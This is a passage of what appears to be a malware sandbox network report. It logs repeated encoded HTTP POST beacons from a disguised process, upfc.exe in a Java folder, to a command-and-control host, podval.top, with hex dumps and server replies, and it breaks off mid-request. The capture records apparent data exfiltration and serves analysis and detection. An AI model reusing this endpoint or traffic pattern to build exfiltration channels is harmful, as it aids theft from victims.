                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:55.994710922 CEST1060OUTData Raw: 5f 51 5a 5c 5b 5d 52 58 58 56 55 51 50 5e 59 52 55 59 5e 59 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ\[]RXXVUQP^YRUY^YQXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2*?&*;%0?]*>. .%\9.6$%\$U+R,>44$^8,"['$Y
                                                    Jul 3, 2024 16:42:56.088675022 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:56.473120928 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KzE6qljATUu82PpLeohEo%2BJ7Uy%2FT2vZOBcFoCECm%2FYMYTmUnUOvoM5GP1tT3zzRAs8T2wtz2TMCpdU4GDmhKFV%2FANdR9fzfD2472tJ9wDdrrnCHoTR%2BW4HG4el%2Fn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a51c4f195e64-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.1049777188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:56.607271910 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:56.963352919 CEST1060OUTData Raw: 5a 56 5f 5c 5b 57 57 58 58 56 55 51 50 5e 59 5a 55 5c 5e 5b 51 5d 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_\[WWXXVUQP^YZU\^[Q]S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%33(*X17:.06' <,X' #/"['$Y
                                                    Jul 3, 2024 16:42:57.054595947 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:57.428008080 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYndJHp0w%2BotbK5rVVh8yElcR36wIFVmVusQkCyBV5ol5V3RPVGGVOTuZQ%2BjqUAsIm3bH5qL%2B1ApJUtMv%2FMTncMPDTENyL1TV6jUI6PuxX0%2BNX8eYFLBZEuQg6WW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5224bb17c9f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    60192.168.2.1049778188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:57.563988924 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:57.916486025 CEST1056OUTData Raw: 5f 56 5f 5e 5e 5b 52 5a 58 56 55 51 50 59 59 50 55 5f 5e 5a 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_^^[RZXVUQPYYPU_^ZQ]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&)<D''$3;*>79Y.-=Z'5]0,.[4</"['$Y )
                                                    Jul 3, 2024 16:42:58.026321888 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:58.369852066 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35jWX3ATCEyhyFiocxR8jRjET1xnPLHo7UyLZYtTAsnrRaytonkzdx9gQEfG8AWTKL9%2Fz1PwwRB6l0sOi1MiFcrgrCf8DSXjfFMPnPbHmWMYsyfC9F621VPbM2eu"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5286c025e5f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    61192.168.2.1049779188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:58.820313931 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.1049780188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:59.128642082 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:59.482965946 CEST1756OUTData Raw: 5f 55 5f 5a 5b 59 52 58 58 56 55 51 50 59 59 5a 55 59 5e 5f 51 58 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_Z[YRXXVUQPYYZUY^_QXS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&98E'8'#7)-U4=)]-X'6*33+/X#14_/<"['$Y
                                                    Jul 3, 2024 16:42:59.574567080 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:59.791282892 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcdBqrY9rm7H5jUuxqCBBxAkK1fuXjW1JJVwSKWKszFwIAGGQGLQywWtkVvDaF8QpIAd7Z82rPY8lHzP0w1PwwBQ2y3UNQpDHTtnDi2GA9WHnKYA6%2Fewa2f3LEic"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5321f7a8cda-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 26 5c 2d 5a 32 0c 2b 55 3a 03 3f 57 3f 03 34 1b 2f 29 36 07 28 0a 35 13 2e 10 04 16 34 04 2e 18 3f 02 09 06 26 30 27 0e 22 21 20 5b 04 1c 23 59 3c 14 25 5f 2b 06 23 11 32 02 08 1f 27 24 36 02 33 05 2a 1c 30 28 3f 12 3f 06 25 55 30 1c 28 04 3e 28 00 12 28 34 2e 13 22 24 21 54 02 13 22 1d 30 3e 21 53 37 33 27 1e 31 09 3d 16 27 34 23 52 30 0d 00 1d 2a 20 36 1d 27 08 34 5b 21 2f 3f 57 27 16 2e 17 30 3d 2d 5d 35 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&\-Z2+U:?W?4/)6(5.4.?&0'"! [#Y<%_+#2'$63*0(??%U0(>((4."$!T"0>!S73'1='4#R0* 6'4[!/?W'.0=-]5#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    63192.168.2.1049781188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:59.252626896 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:59.604455948 CEST1056OUTData Raw: 5f 53 5a 5f 5b 5a 52 5f 58 56 55 51 50 59 59 52 55 58 5e 5f 51 5c 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ_[ZR_XVUQPYYRUX^_Q\S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%:'$$'(." :-[0&*'03/> #<^8,"['$Y !
                                                    Jul 3, 2024 16:42:59.698293924 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:00.043376923 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7G7KAL%2F9X1jYdUNeFzshwFXT%2FgTDGPK8L0Qa6ORrySJ8GybotQVc86fYQrHW1C65pXtHqWcwvrwLjDMpBnuGtJreMNKEEU8s3oRwxzUJOCieIwAAvBTFE8BPAJZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a532db068cec-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    64192.168.2.1049782188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:00.171107054 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:00.526432037 CEST1060OUTData Raw: 5a 52 5a 5c 5b 58 52 5f 58 56 55 51 50 5d 59 56 55 5f 5e 5a 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZ\[XR_XVUQP]YVU_^ZQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]130<' <)=%4.*,>&'C>0 +U/Y"!<;<"['$Y 5
                                                    Jul 3, 2024 16:43:00.666547060 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:00.872206926 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gcep6Vjw8A7oiMNWa97GvrdOoyc2RU2cy1wwCuYHDWeUJjCHjbRhhURMUfvpKeNpSWa9ruKzj4Hio7V%2FeScv78%2F7f%2BzzxNEvFHbKfRn%2FgZuWpH44mLRM%2BAeRCV3W"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a538ddc34327-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.1049783188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:01.204329014 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:01.560837030 CEST1060OUTData Raw: 5a 51 5f 5f 5b 5f 57 5d 58 56 55 51 50 51 59 57 55 59 5e 55 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQ__[_W]XVUQPQYWUY^UQ^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1$ 007_).2 -,>*$5.03<,._4 X,"['$Y
                                                    Jul 3, 2024 16:43:01.656590939 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:02.005528927 CEST588INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1IuGYH8P0X8uMwP221DBonmc%2BkgDAOtn67Mvtd%2B1XdlDKSwqs5Qx%2BASC8CV8CsXHgGBI6Ipf4KQbY7ZbbvLm4%2F1E4j1V4%2B1wO28t%2FSHrY1fzzVNs%2BHEiuIZ2XSU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a53f1a2f0f8b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    66192.168.2.1049784188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:02.141688108 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:02.494625092 CEST1060OUTData Raw: 5f 50 5a 5c 5b 5f 52 5f 58 56 55 51 50 5c 59 5b 55 50 5e 5e 51 5d 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _PZ\[_R_XVUQP\Y[UP^^Q]SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%'')'3;_)>S#=[..9X$65]$U4;=< !$8,"['$Y 1
                                                    Jul 3, 2024 16:43:02.589682102 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:02.956029892 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lppXqCZ0R9bH7FiLWD%2Fw3mCvCqeUfHjOEFNzcoCUZ4ydPKPTpFkyau5Xcd89eCcy2BxyQyzC9aviymbBbkJOVJNyLrFpxBBWYkgUYasV43WhMVhmtMQTXmioO75t"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a544eb1f7d05-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    67192.168.2.1049785188.114.97.380
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:02.458951950 CEST293OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:02.807280064 CEST344OUTData Raw: 00 01 01 06 06 08 01 06 05 06 02 01 02 07 01 03 00 01 05 0a 02 04 03 0e 07 04 0d 0c 03 0e 01 06 0d 01 04 5d 02 50 05 52 0b 0b 07 06 07 01 04 04 03 03 0f 00 0d 03 07 06 06 54 06 04 07 0a 05 58 05 07 0f 0d 00 04 07 51 0f 01 0f 02 0f 50 0f 04 07 53
                                                    Data Ascii: ]PRTXQPSRR\L~kc~O`\v\vu^O~o~XvotBps_{o`ZlcaZ}ltgs^i_~V@Ax}~O}ri
                                                    Jul 3, 2024 16:43:03.009331942 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.532474995 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Td2VLk0UJF9fL4%2FwXQdvRNGQNynRizt0xpU4Gz8OsLjUN4HwwRTAcemosk1S%2FDYRlE2s92yxRyhbm8mACfEqm2p3i6fu8FLqVBjUe7Cw9sJ3wiVDzFKAuEXu6JRP"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5478ae97cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 35 35 34 0d 0a 56 4a 7e 4c 7a 7e 77 00 6c 61 60 4b 68 5f 5a 58 69 5e 73 4f 7f 70 57 0c 79 63 6c 05 7d 5b 60 03 60 4d 72 55 7b 62 61 03 76 76 56 02 69 61 78 01 55 4b 72 51 77 71 6b 4a 6b 04 66 5c 7c 77 5b 54 6f 5f 63 55 7e 4d 70 5a 75 71 75 04 74 07 6a 5d 68 4f 71 5b 7d 6c 63 51 69 5e 67 03 75 5c 7b 06 7c 5b 6d 05 7e 73 6d 00 78 67 6f 5c 78 74 74 4f 78 53 55 49 79 5c 7b 5a 6f 63 6e 4c 6b 60 6c 44 6c 67 77 59 6a 61 7b 4e 75 58 60 48 7a 51 41 5b 68 5e 67 54 7f 5f 57 40 77 7c 78 07 78 7c 60 03 77 63 6d 50 7b 61 53 04 69 7c 75 5e 7a 61 72 05 77 60 7f 07 76 71 5e 06 60 5f 5c 50 7e 5d 79 5f 77 62 6e 5d 76 66 7c 09 68 52 65 05 77 6f 60 04 7f 73 6f 59 6f 6f 7f 03 7b 5e 66 06 7c 6d 6f 51 77 01 7f 5e 69 62 6e 09 69 53 73 4f 7a 6d 5f 5e 7e 61 7d 07 7b 5d 46 51 7d 7c 70 43 69 60 77 54 7d 74 65 59 78 6d 55 07 78 62 56 00 7c 4f 51 07 7d 74 60 50 7f 70 5b 0c 6d 5d 5e 4f 7f 61 7c 4b 74 5a 75 51 7b 5c 79 06 75 76 64 07 7e 48 64 4e 7e 58 6d 4f 77 62 73 4a 7c 72 57 42 7f 49 6a 0a 78 76 7c 0d 7e 73 6b 48 77 62 75 06 74 [TRUNCATED]
                                                    Data Ascii: 554VJ~Lz~wla`Kh_ZXi^sOpWycl}[``MrU{bavvViaxUKrQwqkJkf\|w[To_cU~MpZuqutj]hOq[}lcQi^gu\{|[m~smxgo\xttOxSUIy\{ZocnLk`lDlgwYja{NuX`HzQA[h^gT_W@w|xx|`wcmP{aSi|u^zarw`vq^`_\P~]y_wbn]vf|hRewo`soYoo{^f|moQw^ibniSsOzm_^~a}{]FQ}|pCi`wT}teYxmUxbV|OQ}t`Pp[m]^Oa|KtZuQ{\yuvd~HdN~XmOwbsJ|rWBIjxv|~skHwbutOiI|qb~BVA}IwuO{x\SG|paK{IpCyw^LxCcz\p{cr|p|{gl|boNv_lI|lU|wV@|OSv|`O{lpIwNT@z_}I}|~{OfuMQKva|OtaT|NP@truMu[`A||WMwB|]`ylg{^fmhCvwRL~rTO|m{mn}ry}`hB|BxN~`V~I\{}sI{bp|Os|gU|peA{sl~bdtsSz_[DvHh~X|~HaAtr{bSY~Cxft}]QuLuLtq}|abK|d@gcuqk{r_J}^_xgh{g^ymUFxrpI{cr{]NZlww^iqNvqVJ}RsYdhqSbR`
                                                    Jul 3, 2024 16:43:03.532692909 CEST704INData Raw: 02 78 52 73 5b 63 59 6e 43 6e 5f 71 4a 6a 52 6a 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 72 04 74 04 72 5f 76 65 60 0b 68 52 53 4d 63 6c 6b 5d 7e 73 68 00 6f 6c 63 45 78 70 62 07 7c 53 5d 53 74 59 60 07 7d 5b 61 54 7a 53 59 51 6f
                                                    Data Ascii: xRs[cYnCn_qJjRj_z\yvxBagx[L~Jx^rtr_ve`hRSMclk]~sholcExpb|S]StY`}[aTzSYQoaeZS[_PrsHQorSUTQWq`CTq]DUmZkQ|SR|zTWwS~wHXojPPrffbeEQ{_S\SQuu{k\WOIiRlft}MdZvLyLvar]|OT|R~IsurhZouqVMr]ldCT{o[WnWT[cIQ`aLVwpYRF}roBua|JR
                                                    Jul 3, 2024 16:43:03.594738960 CEST269OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:03.690135002 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:03.690380096 CEST384OUTData Raw: 5f 54 5a 58 5e 5b 57 5a 58 56 55 51 50 5c 59 56 55 5b 5e 5b 51 5c 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
